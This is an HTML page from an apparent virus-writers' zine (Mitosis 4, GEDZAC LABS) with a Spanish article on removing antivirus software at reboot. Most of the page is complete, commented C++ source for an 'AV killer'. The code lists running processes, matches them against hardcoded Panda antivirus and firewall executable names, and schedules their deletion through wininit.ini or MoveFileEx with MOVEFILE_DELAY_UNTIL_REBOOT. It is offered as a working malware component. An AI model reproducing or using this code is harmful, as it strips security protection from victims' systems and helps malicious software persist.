
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style100 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style102 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FF0000; }
.style103 {color: #999999}
.style104 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }


-->

</style>
</head>

<body>

  <div align="left">
    <p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Eliminar AV al reiniciar</span><br>
    #Autor: <strong>MachineDramon</strong></span><br>
    <span class="style102">#Este articulo contiene un source</span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">Esta forma de eliminar avs, puede complementar la que se usa terminando el proceso del av
      y borrandolo, una de sus aplicaciones, puede ser para esos avs y firewalls, que no podemos
      cerrar de la forma clasica, entonces le decimos a Windows que borre sus ejecutables en el
      prox. reinicio.
 Win tiene sus mecanismos para borrar o reemplazar files al siguiente reinicio, en los Win9x
      y WinME (aunque solo le he probado en Win98, pero en teoria en esas versiones tambien
      deberia ser asi), win usa un archivo .ini llamado Wininit.ini que se crea en el directorio 
    de windows cuya estructura es m&agrave;s o menos asi:</p>
    <p align="justify"><em> [Rename]<br>
    c:\RutaNueva\NombreNuevo.exe=c:\RutaVieja\NombreViejo.exe<br>
    NUL=c:\ruta\file.exe</em></p>
    <p align="justify">Entonces Win al prox reinicio renombrar&igrave;a NombreViejo.exe como NombreNuevo.exe y lo colocaria
      en C:\RutaNueva\ , Tambien borraria a file.exe<br>
    Tanto las rutas como los nombres de archivo deben estar en formato ms-dos, osea 8 caracteres
      para nombres de archivos y carpetas y 3 caracteres de extension. En Win2000, WinXP (aunque solo lo he probado en WinXP), en WinNT nose, tal vez sea igual guarda las rutas de los files a mover o eliminar en el reg:
    <p align="justify"><em>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations</em></p>
    <p align="justify">Donde PendingFileRenameOperations es un tipo REG_MULTI_SZ.<br> 
      Adjunto hay un code en C++ explicado y un KillAV que elimina varios avs al reinicio,aqui os dejo el source.
    <p class="style55 style103">#include &lt;windows.h&gt;<br>
    #include &lt;tlhelp32.h&gt;<br>
    #include &lt;string.h&gt;<br>
    #include &lt;stdio.h&gt;</p>
    <p class="style104">//Como cargaremos algunas apis con GetProcAddress, estas variables nos serviran para<br>
    //Almacenar los punteros a esas apis<br>
    typedef DWORD (WINAPI *GMF) (HANDLE, HMODULE, LPSTR, DWORD);<br>
    typedef DWORD (WINAPI *MVF) (LPSTR, LPSTR, DWORD);</p>
    <p class="style104">//en el ejemplo se usaran los nombres de los .exe de uno de tantos avs,<br>
    //elegido al azar y sin ninguna perferencia. Para almacenar los nombres<br>
    //usamos un array de punteros<br>
    char *av[12]={&quot;PFWCONF.EXE&quot;,&quot;PFWSVC.EXE&quot;,&quot;PAV.EXE&quot;,&quot;PAVMAIL.EXE&quot;,<br>
&quot;PAVSS.EXE&quot;,&quot;PER.EXE&quot;,&quot;PERD.EXE&quot;,&quot;PERTSK.EXE&quot;,&quot;PERUPD.EXE&quot;,<br>
&quot;PERVAC.EXE&quot;,&quot;PERVACD.EXE&quot;,&quot;TSKWIZAR.EXE&quot;};</p>
    <p class="style104">//Esta funcion nos devuelve la version de Win, 1=Win9x,WinME ; 2=WinXP,Win2000<br>
    int GetOSVersion()<br>
    {<br>
    OSVERSIONINFO OSinfo;<br>
    OSinfo.dwOSVersionInfoSize=sizeof(OSinfo);<br>
    GetVersionEx(&amp;OSinfo);<br>
    return OSinfo.dwPlatformId;<br>
    }</p>
    <p class="style104">//si no existe creamos el wininit.ini en el dir de windows y si existe lo reemplazamos<br>
    int Ini9x()<br>
    {<br>
    //obtenemos la ruta del dir de win, y le a&ntilde;adimos \\wininit.ini<br>
    char ruta[MAX_PATH], cad[]=&quot;[Rename]&quot;;<br>
    DWORD dw;<br>
    GetWindowsDirectory(ruta,sizeof(ruta));<br>
    strcat(ruta,&quot;\\wininit.ini&quot;);<br>
    //creamos el wininit.ini<br>
    HANDLE w = CreateFile(ruta,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,0,0);<br>
    //si error salimos<br>
    if (w==INVALID_HANDLE_VALUE) return 0;<br>
    //escribimos &quot;[Rename]&quot; en el wininit.ini<br>
    WriteFile(w,cad,strlen(cad),&amp;dw,0);<br>
    //cerramos el archivo<br>
    CloseHandle(w);<br>
    return 0;<br>
    }</p>
    <p class="style104">//esta funcion nos dice si el nombre del ejecutable que le pasamos en la cadena ap<br>
    //coincide con alguno de los del array de av, regresa 1 si es un av y 0 si no.<br>
    bool IsAv(char *ap)<br>
    {<br>
    //ponemos el argumento a mayusculas, para comparar, porque los nombres<br>
    //de avs del array estan en mayusculas<br>
    strupr(ap);<br>
    <br>
    /*En caso de que se este usando un array, con m&aacute;s nombres de avs, he ob<br>
    servado que algunos de estos nombre dan falsos positivos, no siendo avs<br>
    para no eliminarlos, ponemos este if */<br>
    //if (strstr(rav,&quot;CTFMON&quot;) || strstr(rav,&quot;OPERA&quot;) || strstr(rav,&quot;PERFMON&quot;) || strstr(rav,&quot;MMTASK&quot;) || strstr(rav,&quot;FLASH&quot;) || strstr(rav,&quot;[&quot;) || strstr(rav,&quot;DDHELP&quot;)) { return 0; }</p>
    <p class="style104"> for (int i=0; i&lt;12; i++)<br>
    { if (strstr(ap,av[i])) { return 1; } }<br>
    return 0;<br>
    }</p>
    <p class="style104">//esta funcion a&ntilde;ade al wininit.ini una ruta de archivo para que sea borrado al<br>
    //prox. reinicio<br>
    int Kill9x(char *avxe)<br>
    {<br>
    char ruta[MAX_PATH], dp[MAX_PATH], ap[MAX_PATH]=&quot;\r\nNUL=&quot;;<br>
    DWORD dw, sz;<br>
    //obtenemos la ruta del dir de win y le a&ntilde;adimos \wininit.ini<br>
    GetWindowsDirectory(ruta,sizeof(ruta));<br>
    strcat(ruta,&quot;\\wininit.ini&quot;);<br>
    //obtenemos la ruta en formato ms-dos del archivo a a&ntilde;adir, GetShortPathName falla<br>
    //si se aplica a un archivo que no existe, si estamos combinando esto con la tecnica<br>
    //de hacer TerminateProccess y DeleteFile, hacer esto antes del DeleteFile o verificar<br>
    //la existencia del archivo antes de llamar a GetShortPathName<br>
    if (!GetShortPathName(avxe,dp,sizeof(dp))) return 0;<br>
    //obtenemos en ap una cadena tipo: &quot;NUL=c:\ruta\file.exe&quot;<br>
    strcat(ap,dp);</p>
    <p class="style104"> //abrimos el wininit.ini con permiso de lectura y escritura<br>
    HANDLE wht = CreateFile(ruta,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);<br>
    //si no error<br>
    if (wht!=INVALID_HANDLE_VALUE)<br>
    {<br>
    //obtenemos el tama&ntilde;o del wininit.ini<br>
    sz = GetFileSize(wht,0);<br>
    //obtenemos un puntero a un buffer de memoria suficientemente grande para leerlo<br>
    LPSTR wsb = (LPSTR)GlobalAlloc(GPTR,sz+1);<br>
    //si no error<br>
    if (wsb)<br>
    {<br>
    //lo leemos<br>
    ReadFile(wht,wsb,sz,&amp;dw,0);<br>
    //colocamos un nulo al final del buffer para que sea una cadena<br>
    wsb[sz]='\0';<br>
    //pasamos el buffer y ap a mayusculas para compararlos<br>
    strupr(wsb);<br>
    strupr(ap);<br>
    }</p>
    <p class="style104"> //si el buffer ya contiene a ap, quiere decir que ya habiamos a&ntilde;adido ese .exe<br>
  //y no lo volvemos a a&ntilde;adir,(sino tendriamos un wininit.ini excesivamente grande)<br>
    //sino esta ap en el buffer, ponemos el filepointer al final del wininit.ini<br>
    //y escribimos ap<br>
    if (!strstr(wsb,ap))<br>
    {<br>
    SetFilePointer(wht,0,0,FILE_END);<br>
    WriteFile(wht,ap,strlen(ap),&amp;dw,0);<br>
    }<br>
    //liberamos el buffer<br>
    GlobalFree(wsb);<br>
    //cerramos el wininit.ini<br>
    CloseHandle(wht);<br>
    } <br>
    return 0;<br>
    }<br>
    //esta funcion a&ntilde;ade la ruta de un file.exe a PendingFileRenameOperations para ser<br>
    //eliminado al prox reinicio<br>
    int KillNT(char *avxe)<br>
    {<br>
    //variables<br>
    char vacio[]=&quot;VACIO&quot;;<br>
    char *RegSz;<br>
    HKEY hKey;<br>
    <br>
    //abrimos llave HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager<br>
    DWORD h = RegOpenKeyEx(HKEY_LOCAL_MACHINE,&quot;SYSTEM\\CurrentControlSet\\Control\\Session Manager&quot;,0,KEY_QUERY_VALUE,&amp;hKey);<br>
    //si no error<br>
    if (h==ERROR_SUCCESS)<br>
    {<br>
    //El tipo REG_MULTI_SZ son varias cadenas separadas por un null, y al final de todas<br>
    //las cadenas hay 2 null, como no sabemos cuantos bytes necesitamos para<br>
    //leer la key llamamos a RegQueryValueEx sin especificar una variable para el<br>
    //retorno del valor de la key, en ese lugar pasamos null(0), en KeySize<br>
    //nos devuelve el numero de bytes necesarios para leer la key<br>
    DWORD KeySize=0, dwType=REG_MULTI_SZ;<br>
    h = RegQueryValueEx(hKey,&quot;PendingFileRenameOperations&quot;, 0, &amp;dwType, 0, &amp;KeySize);<br>
    //si no hubo error al acceder a la key, quiere decir que ya existe<br>
    if (h==ERROR_SUCCESS)<br>
    {<br>
    //con malloc obtenemos un puntero char del tama&ntilde;o necesario para leer la key<br>
    //si error cerramos la llave y salimos<br>
    if ((RegSz=(char *)malloc(KeySize))==NULL) { RegCloseKey(hKey); return 0; }<br>
    //leemos los datos de la key<br>
    RegQueryValueEx(hKey,&quot;PendingFileRenameOperations&quot;, 0, &amp;dwType, (LPBYTE)RegSz, &amp;KeySize);<br>
    //quitamos los null intermedios de las cadenas reemplazandolos por espacios<br>
    //se resta 2 a KeySize, porque no queremos tocar los 2 ultimos null <br>
    for(int i=0;i&lt;(KeySize-2);i++)<br>
    if (RegSz[i]=='\0') RegSz[i]=32;<br>
    }<br>
    //si hubo error al leer la key quiere decir que no existia todavia<br>
    else<br>
    {<br>
    //como vamos a usar RegSz en la comparacion, apuntamos el puntero a la direccion<br>
    //de la cadena vacio, para que no este indefinido<br>
    RegSz=vacio;<br>
    }</p>
    <p class="style104"> //si el buffer apuntado por RegSz ya contiene a avxe entonces ya habiamos a&ntilde;adido<br>
  //ese .exe y no lo volvemos a a&ntilde;adir <br>
    if(!strstr(RegSz,avxe)) <br>
    {<br>
    //sino cargamos a Kernel32.dll<br>
    HMODULE krn = LoadLibrary(&quot;KERNEL32.DLL&quot;);<br>
    //si no error<br>
    if (krn)<br>
    {<br>
    //obtenemos la direccion de MoveFileEx<br>
    MVF pMovFil = (MVF)GetProcAddress(krn,&quot;MoveFileExA&quot;);<br>
    //si no error, usamos MoveFileEx con la bandera MOVEFILE_DELAY_UNTIL_REBOOT<br>
    //pasando como 1&deg; argumento la ruta del .exe y como 2&deg; null, para indicar<br>
    //que el .exe se debe borrar al prox. reinicio, si se quisiera mover<br>
    //en el 2&deg; argumento iria la nueva ruta del file.<br>
    //con esto se crea la key PendingFileRenameOperations si no existia o se <br>
    //le agrega la ruta del .exe si ya existia<br>
    if (pMovFil) { pMovFil(avxe,0,MOVEFILE_DELAY_UNTIL_REBOOT); }<br>
    //descargamos la libreria<br>
    FreeLibrary(krn); <br>
    }<br>
    }<br>
    //si no hubo error en leer la key liberamos el buffer, que usamos para leerla<br>
    if (h==ERROR_SUCCESS) free(RegSz);<br>
    //cerramos la llave<br>
    RegCloseKey(hKey);<br>
    }<br>
    return 0; <br>
    }</p>
    <p class="style104">int ListProcess()<br>
    {<br>
    //creamos una Snapshot de los procesos activos y declaramos una struct PROCESSENTRY32<br>
    HANDLE Snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);<br>
    PROCESSENTRY32 pi;<br>
    pi.dwSize=sizeof(PROCESSENTRY32);</p>
    <p class="style104"> //si no hay error Process32First devolvera en la struct pi, los datos del 1&ordm; proceso<br>
    //de la Snapshot<br>
    if(Process32First(Snap,&amp;pi))<br>
    {<br>
    //este do-while nos ira devolviendo los datos de cada proceso<br>
    do<br>
    { <br>
    //un switch para diferenciar la version de Win<br>
    switch(GetOSVersion())<br>
    {<br>
    //si estamos en Win9x,WinMe<br>
    case 1:<br>
    //en estamos Win98 el miembro .szExeFile de la struct pi contiene la ruta<br>
    //completa del .exe que genera el proceso, como solo queremos el nombre del .exe<br>
    //y no la ruta, usamos strrchr() que nos devuelve un puntero desde la primera ocu<br>
    //rrencia a partir de la derecha de '\' ,osea si tenemos c:\ruta\file.exe<br>
    //devuelve algo como: \file.exe ,si IsAv da True pasamos la ruta del file a<br>
    //Kill9x()<br>
    if (IsAv(strrchr(pi.szExeFile,'\\'))) Kill9x(pi.szExeFile);<br>
    break;<br>
    <br>
    //si estamos en WinXP,Win2000 <br>
    case 2:<br>
    //en WinXP .szExeFile solo contiene el nombre del ejecutable del proceso, entons<br>
    //lo mandamos a IsAv defrente, si devuelve True necesitamos la ruta del .exe<br>
    if (IsAv(pi.szExeFile))<br>
    {<br>
    //abrimos el proceso con permisos para obtener informacion sobre &egrave;l<br>
    HANDLE nt = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,0,pi.th32ProcessID);<br>
    //si error salimos del switch<br>
    if (nt&lt;=0) break;<br>
    //cargamos la PSAPI.DLL<br>
    HMODULE psp = LoadLibrary(&quot;PSAPI.DLL&quot;);<br>
    //si no hay error<br>
    if (psp)<br>
    {<br>
    //obtenemos la direccion a GetModuleFileNameEx<br>
    GMF pGetMod = (GMF)GetProcAddress(psp,&quot;GetModuleFileNameExA&quot;);<br>
    //si no hay error, llamamos a GetModuleFileNameEx usando el puntero<br>
    //a su direccion y nos devuelve la ruta de .exe en .szExeFile<br>
    if (pGetMod) { pGetMod(nt,0,pi.szExeFile,MAX_PATH); }<br>
    //descargamos la PSAPI.DLL<br>
    FreeLibrary(psp);<br>
    //mandamos la ruta del .exe a KillNT()<br>
    KillNT(pi.szExeFile);<br>
    }<br>
    //cerramos el proceso<br>
    CloseHandle(nt);<br>
    }<br>
    break;<br>
    }<br>
    //este do-while usa Process32Next para ir devolviendo la info del prox. proceso<br>
    //cuando ya no haya m&agrave;s procesos devolvera 0 y saldremos del bucle<br>
    }while(Process32Next(Snap,&amp;pi));<br>
    }<br>
    //cerramos el handle a la Snapshot<br>
    CloseHandle(Snap);<br>
    return 0;<br>
    }</p>
    <p class="style104">int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)<br>
    {<br>
    //si estamos en Win9x,WinMe inicializamos el wininit.ini<br>
    if (GetOSVersion()==1) Ini9x();<br>
    //listamos los procesos<br>
    ListProcess();<br>
    return 0;<br>
    }</p>
    <p align="justify" class="style103">
    <p align="right" class="style100">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
